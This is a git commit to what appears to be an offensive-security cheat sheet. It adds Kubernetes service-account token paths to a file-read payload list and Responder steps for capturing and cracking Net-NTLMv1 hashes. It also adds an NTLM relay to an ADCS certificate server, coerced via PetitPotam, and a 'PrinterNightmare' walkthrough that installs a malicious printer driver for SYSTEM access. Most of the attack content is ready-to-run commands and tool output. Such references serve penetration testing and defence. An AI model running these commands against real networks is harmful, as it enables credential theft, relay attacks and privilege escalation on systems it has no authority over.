Net-NTLMv1 + DriverPrinter

This commit is contained in:
Swissky 2021-09-06 20:58:44 +02:00
parent 0f94adafe5
commit c8076e99c9
3 changed files with 67 additions and 5 deletions

View File

@ -125,6 +125,9 @@ To bypass this behaviour just add forward slashes in front of the url:
/proc/self/cwd/main.py /proc/self/cwd/main.py
/home/$USER/.bash_history /home/$USER/.bash_history
/home/$USER/.ssh/id_rsa /home/$USER/.ssh/id_rsa
/run/secrets/kubernetes.io/serviceaccount/token
/run/secrets/kubernetes.io/serviceaccount/namespace
/run/secrets/kubernetes.io/serviceaccount/certificate
/var/run/secrets/kubernetes.io/serviceaccount /var/run/secrets/kubernetes.io/serviceaccount
/var/lib/mlocate/mlocate.db /var/lib/mlocate/mlocate.db
/var/lib/mlocate.db /var/lib/mlocate.db

View File

@ -58,7 +58,8 @@
- [OverPass-the-Hash (pass the key)](#overpass-the-hash-pass-the-key) - [OverPass-the-Hash (pass the key)](#overpass-the-hash-pass-the-key)
- [Using impacket](#using-impacket) - [Using impacket](#using-impacket)
- [Using Rubeus](#using-rubeus) - [Using Rubeus](#using-rubeus)
- [Capturing and cracking NTLMv2 hashes](#capturing-and-cracking-ntlmv2-hashes) - [Capturing and cracking Net-NTLMv1/NTLMv1 hashes](#capturing-and-cracking-net-ntlmv1ntlmv1-hashes)
- [Capturing and cracking Net-NTLMv2/NTLMv2 hashes](#capturing-and-cracking-net-ntlmv2ntlmv2-hashes)
- [Man-in-the-Middle attacks & relaying](#man-in-the-middle-attacks--relaying) - [Man-in-the-Middle attacks & relaying](#man-in-the-middle-attacks--relaying)
- [MS08-068 NTLM reflection](#ms08-068-ntlm-reflection) - [MS08-068 NTLM reflection](#ms08-068-ntlm-reflection)
- [SMB Signing Disabled and IPv4](#smb-signing-disabled-and-ipv4) - [SMB Signing Disabled and IPv4](#smb-signing-disabled-and-ipv4)
@ -1665,7 +1666,39 @@ klist
.\Rubeus.exe asktgt /user:Administrator /rc4:[NTLMHASH] /createnetonly:C:\Windows\System32\cmd.exe .\Rubeus.exe asktgt /user:Administrator /rc4:[NTLMHASH] /createnetonly:C:\Windows\System32\cmd.exe
``` ```
### Capturing and cracking NTLMv2 hashes
### Capturing and cracking Net-NTLMv1/NTLMv1 hashes
> Net-NTLM (NTLMv1) hashes are used for network authentication (they are derived from a challenge/response algorithm and are based on the user's NT hash.
:information_source: : Coerce a callback using PetitPotam or SpoolSample on an affected machine, to get the machine account Net-NTLM v1 hash
Requirements:
* LmCompatibilityLevel = 0x1: Send LM & NTLM (`reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v lmcompatibilitylevel`)
* Capturing using Responder: Edit the /etc/responder/Responder.conf file to include the magical **1122334455667788** challenge
```ps1
HTTPS = On
DNS = On
LDAP = On
...
; Custom challenge.
; Use "Random" for generating a random challenge for each requests (Default)
Challenge = 1122334455667788
```
* Fire Responder: `responder -I eth0 --lm`
* If you got some `NTLMv1 hashes`, you need to format then submit them on [crack.sh](https://crack.sh/netntlm/), or crack them with Hashcat/John
```ps1
username::hostname:response:response:challenge -> NTHASH:response
NTHASH:F35A3FE17DCB31F9BE8A8004B3F310C150AFA36195554972
```
:warning: NTLMv1 with SSP(Security Support Provider) changes the server challenge and is not quite ideal for the attack, but it can be used.
### Capturing and cracking Net-NTLMv2/NTLMv2 hashes
If any user in the network tries to access a machine and mistype the IP or the name, Responder will answer for it and ask for the NTLMv2 hash to access the resource. Responder will poison `LLMNR`, `MDNS` and `NETBIOS` requests on the network. If any user in the network tries to access a machine and mistype the IP or the name, Responder will answer for it and ask for the NTLMv2 hash to access the resource. Responder will poison `LLMNR`, `MDNS` and `NETBIOS` requests on the network.
@ -1680,6 +1713,7 @@ PS > .\inveighzero.exe -FileOutput Y -NBNS Y -mDNS Y -Proxy Y -MachineAccounts Y
PS > Invoke-Inveigh [-IP '10.10.10.10'] -ConsoleOutput Y -FileOutput Y -NBNS Y mDNS Y Proxy Y -MachineAccounts Y PS > Invoke-Inveigh [-IP '10.10.10.10'] -ConsoleOutput Y -FileOutput Y -NBNS Y mDNS Y Proxy Y -MachineAccounts Y
``` ```
### Man-in-the-Middle attacks & relaying ### Man-in-the-Middle attacks & relaying
NTLMv1 and NTLMv2 can be relayed to connect to another machine. NTLMv1 and NTLMv2 can be relayed to connect to another machine.
@ -1921,8 +1955,9 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101
* Version 1: NTLM Relay + Rubeus + PetitPotam * Version 1: NTLM Relay + Rubeus + PetitPotam
```powershell ```powershell
impacket> python3 ntlmrelayx.py -t http://<ca-server>/certsrv/certfnsh.asp -smb2support --adcs impacket> python3 ntlmrelayx.py -t http://<ca-server>/certsrv/certfnsh.asp -smb2support --adcs
impacket> python3 ./examples/ntlmrelayx.py -t http://10.10.10.10/certsrv/certfnsh.asp -smb2support --adcs --template workstation impacket> python3 ./examples/ntlmrelayx.py -t http://10.10.10.10/certsrv/certfnsh.asp -smb2support --adcs --template VulnTemplate
# Templates: workstation, DomainController, Machine; KerberosAuthentication # For a member server or workstation, the template would be "Computer".
# Other templates: workstation, DomainController, Machine, KerberosAuthentication
# Coerce the authentication via MS-ESFRPC EfsRpcOpenFileRaw function with petitpotam # Coerce the authentication via MS-ESFRPC EfsRpcOpenFileRaw function with petitpotam
# You can also use any other way to coerce the authentication like PrintSpooler via MS-RPRN # You can also use any other way to coerce the authentication like PrintSpooler via MS-RPRN

View File

@ -35,7 +35,7 @@
* [EoP - AlwaysInstallElevated](#eop---alwaysinstallelevated) * [EoP - AlwaysInstallElevated](#eop---alwaysinstallelevated)
* [EoP - Insecure GUI apps](#eop---insecure-gui-apps) * [EoP - Insecure GUI apps](#eop---insecure-gui-apps)
* [EoP - Evaluating Vulnerable Drivers](#eop---evaluating-vulnerable-drivers) * [EoP - Evaluating Vulnerable Drivers](#eop---evaluating-vulnerable-drivers)
* [EoP - Printers](#eop-printers) * [EoP - Printers](#eop---printers)
* [Universal Printer](#universal-printer) * [Universal Printer](#universal-printer)
* [Bring Your Own Vulnerability](#bring-your-own-vulnerability) * [Bring Your Own Vulnerability](#bring-your-own-vulnerability)
* [EoP - Runas](#eop---runas) * [EoP - Runas](#eop---runas)
@ -999,6 +999,30 @@ Remove-Printer -Name $fullprinterName -ErrorAction SilentlyContinue
Add-Printer -ConnectionName $fullprinterName Add-Printer -ConnectionName $fullprinterName
``` ```
### PrinterNightmare
```ps1
git clone https://github.com/Flangvik/DeployPrinterNightmare
PS C:\adversary> FakePrinter.exe 32mimispool.dll 64mimispool.dll EasySystemShell
[<3] @Flangvik - TrustedSec
[+] Copying C:\Windows\system32\mscms.dll to C:\Windows\system32\6cfbaf26f4c64131896df8a522546e9c.dll
[+] Copying 64mimispool.dll to C:\Windows\system32\spool\drivers\x64\3\6cfbaf26f4c64131896df8a522546e9c.dll
[+] Copying 32mimispool.dll to C:\Windows\system32\spool\drivers\W32X86\3\6cfbaf26f4c64131896df8a522546e9c.dll
[+] Adding printer driver => Generic / Text Only!
[+] Adding printer => EasySystemShell!
[+] Setting 64-bit Registry key
[+] Setting 32-bit Registry key
[+] Setting '*' Registry key
```
```ps1
PS C:\target> $serverName = 'printer-installed-host'
PS C:\target> $printerName = 'EasySystemShell'
PS C:\target> $fullprinterName = '\\' + $serverName + '\' + $printerName + ' - ' + $(If ([System.Environment]::Is64BitOperatingSystem) {'x64'} Else {'x86'})
PS C:\target> Remove-Printer -Name $fullprinterName -ErrorAction SilentlyContinue
PS C:\target> Add-Printer -ConnectionName $fullprinterName
```
### Bring Your Own Vulnerability ### Bring Your Own Vulnerability
Concealed Position : https://github.com/jacob-baines/concealed_position Concealed Position : https://github.com/jacob-baines/concealed_position